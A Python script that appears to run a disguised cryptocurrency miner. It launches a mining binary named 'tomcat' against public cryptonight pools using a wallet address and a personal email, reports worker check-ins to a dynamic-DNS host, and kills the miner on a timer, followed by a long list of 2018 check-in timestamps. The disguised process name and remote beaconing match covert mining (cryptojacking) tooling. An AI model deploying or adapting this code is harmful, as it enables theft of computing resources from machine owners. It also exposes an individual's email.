import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:03.794764
#2018-02-17 17:27:04.906042
#2018-02-17 19:17:04.700271
#2018-02-17 21:07:02.115482
#2018-02-17 22:51:01.891834
#2018-02-18 00:36:06.566340
#2018-02-18 02:27:01.738952
#2018-02-18 04:14:03.507133
#2018-02-18 06:04:06.143258
#2018-02-18 07:55:02.188293
#2018-02-18 09:42:07.186484
#2018-02-18 11:27:05.903350
#2018-02-18 13:14:03.375009
#2018-02-18 15:04:05.485835
#2018-02-18 16:52:04.381520
#2018-02-18 18:41:01.831184
#2018-02-18 20:27:06.946040
#2018-02-18 22:13:02.147181
#2018-02-19 00:02:05.392342
#2018-02-19 01:47:04.983615
#2018-02-19 03:36:04.240226
#2018-02-19 05:21:05.396914
#2018-02-19 07:07:04.064605
#2018-02-19 08:55:08.291194
#2018-02-19 10:43:04.741263
#2018-02-19 12:32:09.161501
#2018-02-19 14:21:01.779428
#2018-02-19 16:09:04.310874
#2018-02-19 17:56:01.736783
#2018-02-19 19:42:08.503515
#2018-02-19 21:30:09.250931
#2018-02-19 23:16:06.360544
#2018-02-20 01:01:05.784265
#2018-02-20 02:50:09.077660
#2018-02-20 04:37:07.168154
#2018-02-20 06:21:07.331326
#2018-02-20 08:06:01.955149
#2018-02-20 09:51:06.090469
#2018-02-20 11:35:04.421625
#2018-02-20 13:21:09.297362
#2018-02-20 15:06:04.573541
#2018-02-20 16:50:09.432121
#2018-02-20 18:37:02.166337
#2018-02-20 20:29:05.419294
#2018-02-20 22:14:07.008997
#2018-02-20 23:57:04.516097
#2018-02-21 01:42:06.634499
#2018-02-21 03:30:07.763925
#2018-02-21 05:18:04.102622
#2018-02-21 07:07:01.989021
#2018-02-21 08:52:05.511083
#2018-02-21 10:39:07.112770
#2018-02-21 12:26:08.811995
#2018-02-21 14:13:08.865257
#2018-02-21 16:01:08.007035
#2018-02-21 17:52:08.119563
#2018-02-21 19:37:08.433168
#2018-02-21 21:23:05.626032
#2018-02-21 23:10:09.630710
#2018-02-22 00:59:01.518224
#2018-02-22 02:48:04.431848
#2018-02-22 04:34:08.020692
#2018-02-22 06:19:05.874050
#2018-02-22 08:06:04.832571
#2018-02-22 09:53:07.025514
#2018-02-22 11:37:08.307211
#2018-02-22 13:24:07.312917
#2018-02-22 15:12:01.980190
#2018-02-22 16:56:01.561148
#2018-02-22 18:44:01.820427
#2018-02-22 20:35:09.498826
#2018-02-22 22:20:05.830833
#2018-02-23 00:06:07.644245
#2018-02-23 01:55:04.096966
#2018-02-23 03:42:06.265563
#2018-02-23 05:27:05.732948
#2018-02-23 07:14:04.883620
#2018-02-23 09:19:05.228378
#2018-02-23 11:24:08.875773
#2018-02-23 13:14:05.799468
#2018-02-23 14:59:06.101021
#2018-02-23 16:48:01.783640
#2018-02-23 18:39:08.469999
#2018-02-23 20:25:08.462734
#2018-02-23 22:13:02.204298
#2018-02-24 00:01:05.965903
#2018-02-24 01:52:01.956278
#2018-02-24 03:44:04.006738
#2018-02-24 05:33:03.752941
#2018-02-24 07:19:01.830032
#2018-02-24 09:09:05.792606
#2018-02-24 10:43:04.731839
#2018-02-24 12:28:06.849509
#2018-02-24 14:02:02.056196
#2018-02-24 15:38:06.494257
#2018-02-24 17:18:04.851650
#2018-02-24 18:50:06.474952
#2018-02-24 20:22:04.920008
#2018-02-24 21:49:04.776224
#2018-02-25 00:30:04.254977
#2018-02-25 02:26:01.374886
#2018-02-25 06:15:09.418535
#2018-02-25 11:40:08.916492